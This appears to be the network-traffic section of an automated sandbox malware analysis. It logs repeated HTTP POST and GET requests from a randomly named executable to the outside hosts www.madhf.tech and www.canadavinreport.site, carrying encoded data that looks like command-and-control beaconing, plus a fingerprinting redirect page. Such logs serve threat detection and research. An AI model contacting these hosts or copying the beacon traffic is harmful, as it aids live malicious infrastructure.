                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED]
                                                          Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.549983103.224.182.242803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:40:27.690835953 CET1663OUTPOST /0mwe/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.madhf.tech
                                                          Origin: http://www.madhf.tech
                                                          Referer: http://www.madhf.tech/0mwe/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 46 34 58 73 73 64 63 57 39 64 59 6d 56 33 45 6d 74 39 72 6d 57 47 71 50 39 4a 4d 30 4f 68 49 4d 7a 4b 53 71 52 70 72 7a 48 4e 43 39 49 30 4a 68 63 64 4c 56 69 4f 69 58 76 79 7a 56 76 6a 31 66 45 39 67 6e 45 44 70 4c 5a 65 45 61 79 6c 5a 57 4a 65 35 4f 33 76 6c 6c 63 5a 50 59 6f 66 44 57 61 50 36 6d 6b 62 30 38 79 68 46 45 38 4f 70 48 46 44 74 46 6f 76 39 39 46 67 64 36 79 6a 48 38 63 4d 47 31 2b 6c 4b 79 68 44 76 77 4a 52 4a 7a 57 67 6d 67 50 78 32 43 33 4c 63 6f 59 55 33 47 4e 58 64 74 6f 50 68 32 51 45 79 6d 31 32 76 35 61 48 43 48 54 6a 35 71 63 45 4f 76 59 38 33 4c 79 6a 6b 7a 31 66 71 72 46 2f 50 47 79 34 43 49 2f 6f 6a 41 63 45 77 2b 78 76 67 33 59 42 69 71 62 77 45 72 30 39 32 31 4e 67 74 75 4a 56 47 59 69 66 56 33 57 69 56 55 35 4e 54 78 52 34 4d 45 38 6a 66 45 59 4e 54 39 74 2b 4f 36 41 2b 6b 5a 61 2f 57 48 54 62 69 4e 4e 67 45 4b 78 51 4d 45 57 65 64 70 70 52 51 55 72 55 34 36 51 41 47 57 75 4c 30 77 61 2b 6c 50 61 57 6e 68 6b 79 54 6b 4b 4e 37 4f 51 50 64 6a 41 77 69 [TRUNCATED]
                                                          Data Ascii: KBEhCJ=F4XssdcW9dYmV3Emt9rmWGqP9JM0OhIMzKSqRprzHNC9I0JhcdLViOiXvyzVvj1fE9gnEDpLZeEaylZWJe5O3vllcZPYofDWaP6mkb08yhFE8OpHFDtFov99Fgd6yjH8cMG1+lKyhDvwJRJzWgmgPx2C3LcoYU3GNXdtoPh2QEym12v5aHCHTj5qcEOvY83Lyjkz1fqrF/PGy4CI/ojAcEw+xvg3YBiqbwEr0921NgtuJVGYifV3WiVU5NTxR4ME8jfEYNT9t+O6A+kZa/WHTbiNNgEKxQMEWedppRQUrU46QAGWuL0wa+lPaWnhkyTkKN7OQPdjAwieFHkd5Ge16QeoyP6i/p0T08QcXOpHlEDICQvJ70yIoMp/0wFvGmMhiruaRdSFy5qVpmNxeM3u4+JOpHZ6pOzd7zPWroAm3Y219EVyzxxycqhnmctOoNURxKTLVSn1OtKs4UAePRIv7FA28CVtaAAgicOjT+T5dyCs+uvLwdAlJnFRv0o+K8/tioUSKtoCFZ6sa4++zhY3SZbYDs9LQGrm8Esoq4gI0mF4sIED4DDrGnem14MyBPCXp47F+8I6HD3/D5DXkFlhhWuzTLr1gy8pPWfys1Yoe06guZvO9hfsrMA86P3xtut0+s/RB1MTIgHaQiik1EOknpE0ntrPDn2cCNCdqO4zCjMlM7zQHMfaZ6XrI7LeLBc8uEzTLhEDxYggXJ2OJQcVi3VH5ikIgoOPTFm517j0SYB3v/bBxibkJmKq+7cm/lBT6TKpFWPZXZ3jcmOO/qmK3xmUIlaHWvivG+VThzA449Bdc5WR+fQP9yVYHRV7smQ8StRPXGPcpD3U4CEbHhm4H/YRYgLFcwKIvdggqjqgcrYunRUJCfAAV0V2gsKrj6XS8dhYeS09gEkoR/jjqTYjVxFDVpdM8LWgxENrg/dikgdYCnZEWh08LlSPtSa+n14HQaD1EOmKyJxNaxSKNKRlVhb+wxNtNjIU+opU+ha8++c5S [TRUNCATED]
                                                          Jan 11, 2025 01:40:28.282422066 CET871INHTTP/1.1 200 OK
                                                          date: Sat, 11 Jan 2025 00:40:28 GMT
                                                          server: Apache
                                                          set-cookie: __tad=1736556028.1834882; expires=Tue, 09-Jan-2035 00:40:28 GMT; Max-Age=315360000
                                                          vary: Accept-Encoding
                                                          content-encoding: gzip
                                                          content-length: 576
                                                          content-type: text/html; charset=UTF-8
                                                          connection: close
                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED]
                                                          Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.549984103.224.182.242803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:40:30.335510969 CET375OUTGET /0mwe/?Kdr=RN-HMNoXj6pXm&KBEhCJ=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg== HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          Host: www.madhf.tech
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Jan 11, 2025 01:40:30.942756891 CET1236INHTTP/1.1 200 OK
                                                          date: Sat, 11 Jan 2025 00:40:30 GMT
                                                          server: Apache
                                                          set-cookie: __tad=1736556030.5512181; expires=Tue, 09-Jan-2035 00:40:30 GMT; Max-Age=315360000
                                                          vary: Accept-Encoding
                                                          content-length: 1526
                                                          content-type: text/html; charset=UTF-8
                                                          connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 30 6d 77 65 2f 3f 4b 64 72 3d 52 4e 2d 48 4d 4e 6f 58 6a 36 70 58 6d 26 4b 42 45 68 43 4a 3d 49 36 2f 4d 76 6f 73 49 31 4d 34 47 58 6e 41 43 37 62 53 59 47 46 71 72 78 59 64 67 4a 54 4e 65 39 74 6d 6b 45 73 7a 7a 52 74 4f 57 49 77 52 63 49 76 58 73 30 35 48 61 33 6a 58 59 6f 51 70 78 64 59 35 68 42 30 46 57 51 4d 31 56 7a 56 46 73 4a 62 56 4e 2b 34 4e 77 49 70 54 6c 71 76 50 57 53 38 53 6c 34 70 35 56 6a 42 39 6a 34 39 4a 43 42 45 68 56 6d [TRUNCATED]
                                                          Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/0mwe/?Kdr=RN-HMNoXj6pXm&KBEhCJ=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg==&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcol
                                                          Jan 11, 2025 01:40:30.942800999 CET562INData Raw: 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66
                                                          Data Ascii: or="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/0mwe/?Kdr=RN-HMNoXj6pXm&KBEhCJ=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.549986185.27.134.206803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:40:36.101294041 CET656OUTPOST /g3h7/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.canadavinreport.site
                                                          Origin: http://www.canadavinreport.site
                                                          Referer: http://www.canadavinreport.site/g3h7/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 51 77 43 32 39 6c 67 76 46 79 30 64 58 5a 4a 63 73 69 6f 65 6b 4e 69 68 5a 54 5a 61 36 39 71 76 77 7a 54 66 53 76 59 42 69 65 55 70 47 65 64 46 2b 41 76 71 44 78 47 41 66 4f 64 45 48 54 5a 38 71 79 77 51 62 4c 4d 6e 4f 67 6d 7a 4f 56 72 41 6a 78 49 75 4f 73 4d 77 4f 76 75 63 4a 64 6a 6f 42 78 72 4b 54 66 56 75 55 44 31 57 79 32 38 33 4a 53 66 75 5a 59 41 41 47 41 30 32 4a 59 73 47 7a 36 67 56 4e 5a 65 46 65 59 45 43 46 30 34 44 4a 4b 5a 6e 42 2b 72 64 47 55 6f 42 6e 4a 4c 53 69 67 69 52 55 67 66 44 79 71 47 64 6f 59 2b 6b 55 6b 4a 7a 46 34 66 37 32 49 44 54 42 54 6e 76 4b 59 49 46 4a 58 51 3d
                                                          Data Ascii: KBEhCJ=QwC29lgvFy0dXZJcsioekNihZTZa69qvwzTfSvYBieUpGedF+AvqDxGAfOdEHTZ8qywQbLMnOgmzOVrAjxIuOsMwOvucJdjoBxrKTfVuUD1Wy283JSfuZYAAGA02JYsGz6gVNZeFeYECF04DJKZnB+rdGUoBnJLSigiRUgfDyqGdoY+kUkJzF4f72IDTBTnvKYIFJXQ=
                                                          Jan 11, 2025 01:40:36.707600117 CET683INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sat, 11 Jan 2025 00:40:36 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                          Cache-Control: no-cache
                                                          Content-Encoding: br
                                                          Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e f4 13 5e 75 0e 4f ff b9 09 74 ed 42 62 10 e4 94 04 a6 39 e9 a1 56 63 80 9f 54 1c cf 30 19 49 bb 08 fb 0b 8c 9a 56 74 63 a1 7c d3 97 b2 9c 60 e4 2c 3c 03 70 ca c2 e7 77 6d f2 90 89 bc 30 24 51 87 06 41 ae 8c 4d 07 0e 4b da d0 84 13 f2 0f 71 df fe 77 91 78 b2 5b 8f 1c e0 5a 31 f0 f9 4d 0d 24 00 b3 46 cb ba 7e 7e 6e 85 d8 5f fa 7b fa 0f 93 39 c0 f5 7c 2e 77 97 3e 7c 65 98 a7 16 30 a6 0e e2 da b5 cc fb b6 d7 ce f7 89 f5 c1 4b 78 63 3e dd f7 25 8e 71 85 31 f1 2f 2e 14 d0 c0 4b f8 b0 cb d9 90 c8 ff 78 7b 12 00 fa 0f ec 38 63 4a 0a 13 0b 99 24 a9 c9 05 2f 35 cf 58 21 8c 62 22 56 39 26 54 c5 bc 16 65 96 e7 3a b5 d6 96 5c 67 42 e4 a5 88 99 48 59 c9 54 2e 5c 19 37 90 7e 9c c5 bc 54 5c 58 6d 78 9c 1b 27 52 16 bb 44 38 2d 0a 9e 14 85 73 2d ae cd 44 4f 1b 5d 01 4c 01 fe fd 5d da c5 12 b0 8f 34 24 b0 f3 d7 f7 1f a1 b1 7a be 9b 2e 3d 4d 53 2a a9 22 c4 c7 35 62 e6 87 d0 ee [TRUNCATED]
                                                          Data Ascii: 1b98 #MhEJ^3pNN57KNn^uOtBb9VcT0IVtc|`,<pwm0$QAMKqwx[Z1M$F~~n_{9|.w>|e0Kxc>%q1/.Kx{8cJ$/5X!b"V9&Te:\gBHYT.\7~T\Xmx'RD8-s-DO]L]4$z.=MS*"5b( +PUUv;Gjr"v1F[D=Hp(y.Ek"%3HO%/7.>h2G/JAdJ[hV$:R0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.549987185.27.134.206803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:40:38.651045084 CET676OUTPOST /g3h7/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 227
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.canadavinreport.site
                                                          Origin: http://www.canadavinreport.site
                                                          Referer: http://www.canadavinreport.site/g3h7/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 51 77 43 32 39 6c 67 76 46 79 30 64 46 70 35 63 74 46 38 65 69 74 69 6d 46 44 5a 61 77 64 71 72 77 7a 58 66 53 74 30 52 69 73 41 70 48 39 4a 46 73 52 76 71 45 78 47 41 48 2b 64 64 44 54 59 2b 71 79 38 75 62 4c 67 6e 4f 67 79 7a 4f 56 62 41 6a 47 38 76 55 63 4d 79 47 50 75 65 48 39 6a 6f 42 78 72 4b 54 66 52 45 55 44 74 57 79 48 4d 33 4a 7a 66 74 48 49 41 44 42 41 30 32 43 34 73 61 7a 36 67 33 4e 62 71 76 65 61 38 43 46 30 6f 44 4a 66 74 6f 55 4f 72 62 43 55 70 33 76 38 75 37 6a 57 75 42 4a 77 54 44 72 64 69 44 67 4f 50 4f 4f 47 42 62 57 59 7a 44 6d 62 4c 6b 51 6a 47 47 51 37 59 31 58 41 48 48 36 77 79 32 4c 6f 39 6f 75 35 47 6c 42 49 53 42 6f 32 56 4a
                                                          Data Ascii: KBEhCJ=QwC29lgvFy0dFp5ctF8eitimFDZawdqrwzXfSt0RisApH9JFsRvqExGAH+ddDTY+qy8ubLgnOgyzOVbAjG8vUcMyGPueH9joBxrKTfREUDtWyHM3JzftHIADBA02C4saz6g3Nbqvea8CF0oDJftoUOrbCUp3v8u7jWuBJwTDrdiDgOPOOGBbWYzDmbLkQjGGQ7Y1XAHH6wy2Lo9ou5GlBISBo2VJ
                                                          Jan 11, 2025 01:40:39.254297972 CET683INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sat, 11 Jan 2025 00:40:39 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                          Cache-Control: no-cache
                                                          Content-Encoding: br
                                                          Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e f4 13 5e 75 0e 4f ff b9 09 74 ed 42 62 10 e4 94 04 a6 39 e9 a1 56 63 80 9f 54 1c cf 30 19 49 bb 08 fb 0b 8c 9a 56 74 63 a1 7c d3 97 b2 9c 60 e4 2c 3c 03 70 ca c2 e7 77 6d f2 90 89 bc 30 24 51 87 06 41 ae 8c 4d 07 0e 4b da d0 84 13 f2 0f 71 df fe 77 91 78 b2 5b 8f 1c e0 5a 31 f0 f9 4d 0d 24 00 b3 46 cb ba 7e 7e 6e 85 d8 5f fa 7b fa 0f 93 39 c0 f5 7c 2e 77 97 3e 7c 65 98 a7 16 30 a6 0e e2 da b5 cc fb b6 d7 ce f7 89 f5 c1 4b 78 63 3e dd f7 25 8e 71 85 31 f1 2f 2e 14 d0 c0 4b f8 b0 cb d9 90 c8 ff 78 7b 12 00 fa 0f ec 38 63 4a 0a 13 0b 99 24 a9 c9 05 2f 35 cf 58 21 8c 62 22 56 39 26 54 c5 bc 16 65 96 e7 3a b5 d6 96 5c 67 42 e4 a5 88 99 48 59 c9 54 2e 5c 19 37 90 7e 9c c5 bc 54 5c 58 6d 78 9c 1b 27 52 16 bb 44 38 2d 0a 9e 14 85 73 2d ae cd 44 4f 1b 5d 01 4c 01 fe fd 5d da c5 12 b0 8f 34 24 b0 f3 d7 f7 1f a1 b1 7a be 9b 2e 3d 4d 53 2a a9 22 c4 c7 35 62 e6 87 d0 ee [TRUNCATED]
                                                          Data Ascii: 1b98 #MhEJ^3pNN57KNn^uOtBb9VcT0IVtc|`,<pwm0$QAMKqwx[Z1M$F~~n_{9|.w>|e0Kxc>%q1/.Kx{8cJ$/5X!b"V9&Te:\gBHYT.\7~T\Xmx'RD8-s-DO]L]4$z.=MS*"5b( +PUUv;Gjr"v1F[D=Hp(y.Ek"%3HO%/7.>h2G/JAdJ[hV$:R0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.549988185.27.134.206803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:40:41.198714018 CET1693OUTPOST /g3h7/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.canadavinreport.site
                                                          Origin: http://www.canadavinreport.site
                                                          Referer: http://www.canadavinreport.site/g3h7/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 51 77 43 32 39 6c 67 76 46 79 30 64 46 70 35 63 74 46 38 65 69 74 69 6d 46 44 5a 61 77 64 71 72 77 7a 58 66 53 74 30 52 69 73 34 70 47 50 52 46 2b 69 33 71 46 78 47 41 5a 4f 64 41 44 54 59 2f 71 79 30 71 62 4c 63 64 4f 6b 43 7a 50 30 37 41 6c 30 55 76 61 73 4d 79 4b 76 75 44 4a 64 6a 48 42 77 48 47 54 66 42 45 55 44 74 57 79 45 6b 33 4c 69 66 74 46 49 41 41 47 41 30 36 4a 59 73 6d 7a 36 34 4e 4e 59 47 56 65 75 41 43 45 51 30 44 4c 74 31 6f 57 75 72 5a 50 30 70 2f 76 38 71 67 6a 51 4b 4e 4a 77 6d 6d 72 62 53 44 71 50 53 33 63 31 73 41 43 6f 72 5a 6b 34 62 2b 50 46 36 71 56 61 45 66 55 42 76 61 2b 42 4b 68 4d 66 56 51 6a 35 48 72 61 35 53 41 6a 69 35 41 7a 72 32 6b 55 66 65 4e 57 52 57 48 59 63 6a 67 58 75 79 74 73 36 52 52 56 72 73 70 63 2f 31 6d 53 44 48 66 59 64 75 6b 6c 76 65 53 50 61 62 39 7a 71 45 79 54 62 59 67 46 44 37 6f 6a 43 79 55 4b 47 5a 72 35 38 54 38 66 73 51 36 4b 32 6d 61 6c 68 34 78 38 6a 2f 64 62 2f 45 4f 51 44 4f 4e 54 79 43 36 66 70 44 79 57 63 74 65 63 63 47 [TRUNCATED]
                                                          Data Ascii: KBEhCJ=QwC29lgvFy0dFp5ctF8eitimFDZawdqrwzXfSt0Ris4pGPRF+i3qFxGAZOdADTY/qy0qbLcdOkCzP07Al0UvasMyKvuDJdjHBwHGTfBEUDtWyEk3LiftFIAAGA06JYsmz64NNYGVeuACEQ0DLt1oWurZP0p/v8qgjQKNJwmmrbSDqPS3c1sACorZk4b+PF6qVaEfUBva+BKhMfVQj5Hra5SAji5Azr2kUfeNWRWHYcjgXuyts6RRVrspc/1mSDHfYduklveSPab9zqEyTbYgFD7ojCyUKGZr58T8fsQ6K2malh4x8j/db/EOQDONTyC6fpDyWcteccGWLn99W6SQBuSXYcuxX40SaoH7rO+y2iOCnrRdWE+QxftWDhP/wF/ntsztKSbHDyRd5JqSD1ShNm1YYXQjbhPclz0HqBaCnmskGG1QpxYDiM2GPnELjp1YgVJ8swGzS0XpZs3CEq5NLkDp+wyXJWyeVStM7PHxnqpoMHhJ0GL1h+GNFTIGs0aq0Mgavd23939+wGTu7w/b675lszzPvmcrf7T3NFVcNzgxYEpW8dgLx3m4PiO+ajyoER2I6qpwVeLcVohdnQK7TSnLlmUWq8A7TCdkhQ7x7CsMVOfj2TzhgK3XzjuLU9kMvHE/B3HSDi83SholwdZC6+fR9K0sdrSieoAjNZjkCotUwlH4AmZetNXgRi7I2+FZADNboy49N4+iSteFVW2rO3K6VTlecRnDYaCan0sMUKhY0vqtU1eGphZdoNhqpForns1qFKSPcy4LToIAVkNMyn4ZwoO7VEd2xXj1Cd7VAsKiHjHqBbXT/TRel/lGI7p2qqoUTEKdkRB+dvXuP+qYBorr2UJcJjbrG+lUA3ztr2kruUgPwCnauTtP56oclxsXzqLD2n+QVSQr3BNVgayuP9lpekxT/NXI5kq0wppxCuxYb2776VjkNXEpELT9ceQRUr9Xk0NvvyYP+0//4HGnN6zyOpPGnOJ3cGfRKmd12L5YW [TRUNCATED]
                                                          Jan 11, 2025 01:40:41.791675091 CET683INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sat, 11 Jan 2025 00:40:41 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                          Cache-Control: no-cache
                                                          Content-Encoding: br
                                                          Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e f4 13 5e 75 0e 4f ff b9 09 74 ed 42 62 10 e4 94 04 a6 39 e9 a1 56 63 80 9f 54 1c cf 30 19 49 bb 08 fb 0b 8c 9a 56 74 63 a1 7c d3 97 b2 9c 60 e4 2c 3c 03 70 ca c2 e7 77 6d f2 90 89 bc 30 24 51 87 06 41 ae 8c 4d 07 0e 4b da d0 84 13 f2 0f 71 df fe 77 91 78 b2 5b 8f 1c e0 5a 31 f0 f9 4d 0d 24 00 b3 46 cb ba 7e 7e 6e 85 d8 5f fa 7b fa 0f 93 39 c0 f5 7c 2e 77 97 3e 7c 65 98 a7 16 30 a6 0e e2 da b5 cc fb b6 d7 ce f7 89 f5 c1 4b 78 63 3e dd f7 25 8e 71 85 31 f1 2f 2e 14 d0 c0 4b f8 b0 cb d9 90 c8 ff 78 7b 12 00 fa 0f ec 38 63 4a 0a 13 0b 99 24 a9 c9 05 2f 35 cf 58 21 8c 62 22 56 39 26 54 c5 bc 16 65 96 e7 3a b5 d6 96 5c 67 42 e4 a5 88 99 48 59 c9 54 2e 5c 19 37 90 7e 9c c5 bc 54 5c 58 6d 78 9c 1b 27 52 16 bb 44 38 2d 0a 9e 14 85 73 2d ae cd 44 4f 1b 5d 01 4c 01 fe fd 5d da c5 12 b0 8f 34 24 b0 f3 d7 f7 1f a1 b1 7a be 9b 2e 3d 4d 53 2a a9 22 c4 c7 35 62 e6 87 d0 ee [TRUNCATED]
